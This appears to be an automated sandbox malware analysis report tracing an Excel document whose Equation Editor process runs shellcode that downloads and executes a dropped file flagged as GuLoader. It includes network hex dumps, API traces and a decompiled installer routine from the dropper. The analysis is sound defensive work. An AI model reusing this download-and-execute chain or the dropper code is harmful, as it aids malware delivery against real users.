May 27, 2022 12:02:27.198349953 CEST	16	IN	Data Raw: 40 00 72 41 66 89 1f 83 c7 08 57 e8 18 26 00 00 85 c0 0f 84 3d 01 00 00 57 68 00 58 43 00 e8 2e 2c 00 00 57 68 00 60 43 00 e8 23 2c 00 00 89 5d fc 83 0d 0c a3 42 00 ff e8 c3 02 00 00 89 45 ec e9 10 01 00 00 e8 d2 21 00 00 68 2c a3 40 00 56 8b d8 Data Ascii: @rAfW&=WhXC.,Wh`C#,]BE!h,@V,th(@V,h@V+hCWV(@Vt h!V@3f9XCuWhXC+uhB+@@EBBpB W
May 27, 2022 12:02:27.225797892 CEST	17	IN	Data Raw: 75 0a 68 30 83 40 00 e8 68 2a 00 00 8b 35 28 82 40 00 bd 18 83 40 00 53 55 57 ff d6 85 c0 75 16 53 68 04 83 40 00 57 ff d6 53 89 2d 24 92 42 00 ff 15 1c 82 40 00 a1 40 92 42 00 57 83 c0 69 68 c5 40 40 00 0f b7 c0 57 50 ff 35 60 a2 42 00 ff 15 2c Data Ascii: uh0@h*5(@@SUWuSh@WS-$B@@BWih@@WP5`B,@j\j+Wt9=,BNj4Bj(3_^][SUVWpCW%5BtEpBIdBNf)f3#ftuQ@BQ

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXEPID: 3004, Parent PID: 576

General

Target ID:	0
Start time:	12:01:21
Start date:	27/05/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f6e0000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: EQNEDT32.EXEPID: 1112, Parent PID: 576

General

Target ID:	2
Start time:	12:01:42
Start date:	27/05/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: venxajlddf.exePID: 2944, Parent PID: 1112

General

Target ID:	4
Start time:	12:01:46
Start date:	27/05/2022
Path:	C:\Users\user\AppData\Roaming\venxajlddf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\venxajlddf.exe
Imagebase:	0x400000
File size:	1449584 bytes
MD5 hash:	2A384E15F8133C8B9ECEFA4DA1D96CEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1181440399.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 32%, Metadefender, Browse Detection: 38%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: EQNEDT32.EXEPID: 1112, Parent PID: 576COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	41.8%
Total number of Nodes:	146
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 036D0557 Relevance: 4.6, APIs: 3, Instructions: 77
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(036D0549), ref: 036D0557

Part of subcall function 036D0571: URLDownloadToFileW.URLMON(00000000,036D0582,?,00000000,00000000), ref: 036D05C6

Memory Dump Source

Source File: 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd

Similarity

API ID: DownloadFileLibraryLoad
String ID:
API String ID: 2776762486-0
Opcode ID: 77a244b12767570c6a6a65c45d7e6dad4bf8e2a2125bf22e564e6efbd9289489
Instruction ID: 49709eee600808280c2aa641f75a015be72a84d24fbb8b389effc8310e02783b
Opcode Fuzzy Hash: 77a244b12767570c6a6a65c45d7e6dad4bf8e2a2125bf22e564e6efbd9289489
Instruction Fuzzy Hash: 692108E1C0C3C13BDB26D7704E6AB56BF246B93600F18C5CEE5C10A0E3E3A89104C75A

Uniqueness

Uniqueness Score: -1.00%

Function 036D04D7 Relevance: 3.1, APIs: 2, Instructions: 123
libraryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(036D0549), ref: 036D0557
URLDownloadToFileW.URLMON(00000000,036D0582,?,00000000,00000000), ref: 036D05C6

Memory Dump Source

Source File: 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd

Similarity

API ID: DownloadFileLibraryLoad
String ID:
API String ID: 2776762486-0
Opcode ID: e479b311d44aa1c6f736f45b58f2a22ba678d0cb0b7004bb33d9b1afad0c19ba
Instruction ID: 0dc0ba2ca490ac0b114598dff13d392e70fee799bfc028b804adfe9eb92b1c4d
Opcode Fuzzy Hash: e479b311d44aa1c6f736f45b58f2a22ba678d0cb0b7004bb33d9b1afad0c19ba
Instruction Fuzzy Hash: C641ACA580D3C52FC712E7704E6AB96BF246B93500F0CC6CED9D50A1E3E3A8A205C75A

Uniqueness

Uniqueness Score: -1.00%

Function 036D060F Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinExec.KERNEL32(?,00000001), ref: 036D061C

Part of subcall function 036D062F: ExitProcess.KERNELBASE(00000000), ref: 036D0634

Memory Dump Source

Source File: 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd

Similarity

API ID: ExecExitProcess
String ID:
API String ID: 4112423671-0
Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
Instruction ID: 5fead4ffbca7624edd71f6bd0124a54f72b501b5041cbc5e65c7f3bc4cd6cc59
Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
Instruction Fuzzy Hash: 46F02299D043C255CB30F77C9958BFBAB50EBC2310FCC8867D88008989D1A880F38A2A

Uniqueness

Uniqueness Score: -1.00%

Function 036D05C4 Relevance: 1.6, APIs: 1, Instructions: 58
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,036D0582,?,00000000,00000000), ref: 036D05C6

Memory Dump Source

Source File: 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
Instruction ID: 48c46988aab76ad5408ce67c3423a6e056bf8e490d70b5fcebb7c97670187bbe
Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
Instruction Fuzzy Hash: 28116B74D083C13ACB24E7648945FAAFBA1ABC2710F58C45AE5404E2C9E2A0E4B3822D

Uniqueness

Uniqueness Score: -1.00%

Function 036D0571 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 549c83b135b2f7f0ac777897e0d6cd97d9e965ec87809885d838e17bd5fc88e1
Instruction ID: 406dee0a2babe995e16ff9acb0c9407cc55e9e9ed8ffac7ee6649eabd5b78cbc
Opcode Fuzzy Hash: 549c83b135b2f7f0ac777897e0d6cd97d9e965ec87809885d838e17bd5fc88e1
Instruction Fuzzy Hash: B9114CA1C4C3C22FCB26D7704D6EB56BF655B92610F18CACEE1D50A0E3E3A89104C756

Uniqueness

Uniqueness Score: -1.00%

Function 036D062F Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(00000000), ref: 036D0634

Memory Dump Source

Source File: 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 036D0636 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: eb919fbb6810a3a27bb023fb8d06df3b997c4a9b8484acf3f9ed773b2c4e2575
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: CFD092756125829FD709DF04CA94E66F36AFFD8611F28C268E5044B71AD730ECA2CA98

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 036D04A2 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(036D0490), ref: 036D04A2

Memory Dump Source

Source File: 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b5b41684cd052cde0717915c739421ee8be2787ffd0ee0c40e50625cf08b8445
Instruction ID: df0e4c598d817aab205ba52f1318d578c6e9ac3201fdb50dc631593dd94d5953
Opcode Fuzzy Hash: b5b41684cd052cde0717915c739421ee8be2787ffd0ee0c40e50625cf08b8445
Instruction Fuzzy Hash: 9321AC99C0E7C49FD312DB702F6A09ABF206913000B5C86CFC8994E1A3D759960AD397

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: venxajlddf.exePID: 2944, Parent PID: 1112COMMON

Execution Graph

Execution Coverage:	21.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.8%
Total number of Nodes:	1622
Total number of Limit Nodes:	44

Executed Functions

Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t180 = E00406A35(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E004069C5(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe";
				E00406668(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a260 = 0x400000;
				_t251 = L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe" - _t234; // 0x43
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405F64(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405F64(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406668(L"C:\\Users\\Albus\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E0040360F(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403C25();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2f4 == _t189) {
														L77:
														_t120 =  *0x42a30c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E00406A35(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t189) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t265);
												goto L68;
											}
											_t219 = E00405F64(L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe", _t189);
											if(_t219 < L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe") {
												L48:
												_t264 = _t219 - L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe";
												_v8 = L"Error launching installer";
												if(_t219 < L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe") {
													_t190 = E00405C33(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Albus\\AppData\\Roaming";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Albus\\AppData\\Roaming");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\Albus\\AppData\\Local\\Temp", _t220);
														}
														E00406668(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe", 0x420f08, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E00406428(_t202, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t153 = E00405C4B(0x420f08);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E0040603F(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\Albus\\AppData\\Local\\Temp", _t222);
												E00406668(L"C:\\Users\\Albus\\AppData\\Local\\Temp", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"C:\\Users\\Albus\\AppData\\Roaming\\venxajlddf.exe") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E0040360F(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E0040360F(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040364e
0x0040364f
0x00403656
0x00403659
0x00403660
0x00403663
0x00403676
0x0040367c
0x0040367f
0x00403682
0x00403690
0x00403698
0x004036a3
0x004036bc
0x004036be
0x004036c6
0x004036c6
0x004036d1
0x004036d3
0x004036d3
0x004036e8
0x0040370d
0x0040371b
0x0040371e
0x00403725
0x0040372c
0x0040372c
0x00403725
0x0040372e
0x00403733
0x00403734
0x00403740
0x00403744
0x0040374b
0x00403759
0x0040375e
0x00403765
0x00403769
0x0040376d
0x0040376f
0x0040376f
0x0040376d
0x00403776
0x0040377d
0x00403783
0x0040379b
0x004037ab
0x004037b0
0x004037b6
0x004037bd
0x004037c4
0x004037c6
0x004037c7
0x004037d1
0x004037d8
0x004037da
0x004037dc
0x004037dc
0x004037ef
0x004037f1
0x004038eb
0x004038eb
0x004038ee
0x004038f1
0x00000000
0x00000000
0x004037fb
0x004037fc
0x004037ff
0x00403808
0x00403808
0x0040380b
0x0040380e
0x00403811
0x00403814
0x00403814
0x00403814
0x00403815
0x00403819
0x004038d9
0x004038e2
0x004038e4
0x004038e7
0x004038ea
0x004038ea
0x004038ea
0x00000000
0x0040381f
0x00403820
0x00403821
0x00403825
0x0040383f
0x00403846
0x00403859
0x0040385a
0x0040386f
0x00403874
0x00403876
0x00403878
0x00403894
0x0040389b
0x004038ae
0x004038af
0x004038c4
0x004038ca
0x004038cc
0x004038ce
0x004038d6
0x004038d8
0x00000000
0x004038d8
0x004038d2
0x004038d4
0x004038f9
0x004038fd
0x00403906
0x0040390b
0x00403911
0x0040391c
0x0040391e
0x00403923
0x00403925
0x0040397d
0x00403982
0x0040398b
0x00403992
0x00403995
0x00403b6c
0x00403b6c
0x00403b71
0x00403b7a
0x00403b97
0x00403c0f
0x00403c0f
0x00403c17
0x00403c19
0x00403c19
0x00403c1f
0x00403c1f
0x00403bae
0x00403bba
0x00403bcb
0x00403bd2
0x00403bd9
0x00403bd9
0x00403be1
0x00403bed
0x00403bfb
0x00403c06
0x00000000
0x00000000
0x00000000
0x00403bef
0x00403bef
0x00403bf0
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf9
0x00403c08
0x00403c0a
0x00000000
0x00403c0a
0x00000000
0x00403bf9
0x00403bed
0x00403b84
0x00403b8b
0x00403b8b
0x004039a1
0x00403a48
0x00403a48
0x00403a54
0x00000000
0x00403a54
0x004039b2
0x004039ba
0x00403a0c
0x00403a0c
0x00403a12
0x00403a19
0x00403a67
0x00403a69
0x00403a6e
0x00403a70
0x00403a78
0x00403a78
0x00403a83
0x00403a88
0x00403a8f
0x00403a95
0x00403a97
0x00403b6a
0x00403b6a
0x00403b6a
0x00000000
0x00403a9d
0x00403a9d
0x00403a9f
0x00403aa0
0x00403aa9
0x00403aa2
0x00403aa2
0x00403aa2
0x00403aaf
0x00403ab7
0x00403abe
0x00403ac6
0x00403ac6
0x00403ad3
0x00403adf
0x00403ae9
0x00403ae9
0x00403aeb
0x00403af2
0x00403afc
0x00403b08
0x00403b0e
0x00403b14
0x00403b17
0x00403b21
0x00403b27
0x00403b29
0x00403b2d
0x00403b3e
0x00403b44
0x00403b49
0x00403b4b
0x00403b4e
0x00403b54
0x00403b54
0x00403b4b
0x00403b29
0x00403b57
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b65
0x00000000
0x00403b65
0x00403a97
0x00403a1b
0x00403a1e
0x00403a22
0x00403a27
0x00403a29
0x00000000
0x00000000
0x00403a35
0x00403a40
0x00403a45
0x00000000
0x00403a45
0x004039c3
0x004039db
0x004039ec
0x004039ed
0x004039f1
0x004039f3
0x00403a01
0x00403a08
0x00000000
0x00000000
0x00000000
0x00403a08
0x00403a0a
0x00000000
0x00403a0a
0x0040392d
0x00403939
0x0040393e
0x00403943
0x00403945
0x00000000
0x00000000
0x0040394d
0x00403955
0x00403966
0x0040396e
0x00403970
0x00403975
0x00403977
0x00000000
0x00000000
0x00000000
0x00403977
0x00000000
0x004038d4
0x0040387d
0x0040387f
0x00000000
0x00000000
0x00403881
0x00403885
0x00403889
0x00403890
0x00403890
0x00403890
0x00403890
0x00000000
0x00403890
0x0040388b
0x0040388e
0x00000000
0x00000000
0x00000000
0x0040388e
0x00403827
0x0040382b
0x0040382e
0x00403835
0x00403835
0x00000000
0x00403835
0x00403830
0x00403833
0x00000000
0x00000000
0x00000000
0x00403833
0x00000000
0x00000000
0x00000000
0x00403801
0x00403801
0x00403802
0x00403803
0x00403803
0x00000000
0x00403801
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000), ref: 004037E9
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
lstrcatW.KERNEL32 ref: 00403939
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040394D
lstrcatW.KERNEL32 ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
DeleteFileW.KERNELBASE(1033), ref: 00403982
lstrcatW.KERNEL32 ref: 00403A69
lstrcatW.KERNEL32 ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C

lstrcatW.KERNEL32 ref: 00403A83
